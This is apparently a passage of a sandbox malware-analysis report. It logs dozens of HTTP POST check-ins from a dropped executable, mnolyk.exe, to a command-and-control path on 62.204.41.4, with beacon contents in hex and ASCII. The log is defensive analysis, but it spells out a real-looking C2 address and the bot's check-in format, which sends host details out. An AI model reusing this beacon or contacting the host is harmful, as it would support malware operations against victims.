                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:45.446559906 CET458INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            27192.168.2.44972262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:31.299530983 CET216OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:31.361973047 CET216INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            270192.168.2.44996562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:45.617119074 CET459OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:45.680779934 CET459INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            271192.168.2.44996662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:45.850941896 CET460OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:45.915455103 CET460INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            272192.168.2.44996762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:46.093677044 CET461OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:46.159827948 CET461INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            273192.168.2.44996862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:46.334913969 CET462OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:46.401207924 CET462INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            274192.168.2.44996962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:46.576219082 CET463OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:46.640360117 CET463INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            275192.168.2.44997062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:46.821273088 CET464OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:46.884483099 CET464INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            276192.168.2.44997162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:47.051645994 CET465OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:47.115789890 CET465INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            277192.168.2.44997262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:47.288532019 CET466OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:47.353888035 CET466INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            278192.168.2.44997362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:47.525350094 CET467OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:47.589066982 CET467INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            279192.168.2.44997462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:47.760274887 CET468OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:47.825783014 CET468INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            28192.168.2.44972362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:31.619066000 CET217OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:31.682921886 CET217INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            280192.168.2.44997562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:47.996045113 CET468OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:48.062268972 CET469INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            281192.168.2.44997662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:48.242352962 CET470OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:48.308260918 CET470INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            282192.168.2.44997762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:48.476007938 CET471OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:48.541361094 CET471INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            283192.168.2.44997862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:48.712591887 CET472OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:49.005692005 CET472OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:49.073304892 CET472INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            284192.168.2.44997962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:49.239264011 CET473OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:49.301810026 CET473INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            285192.168.2.44998062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:49.476222038 CET474OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:49.539666891 CET474INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            286192.168.2.44998162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:49.709877014 CET475OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:49.773339987 CET475INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            287192.168.2.44998262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:50.300928116 CET476OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:50.366807938 CET476INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


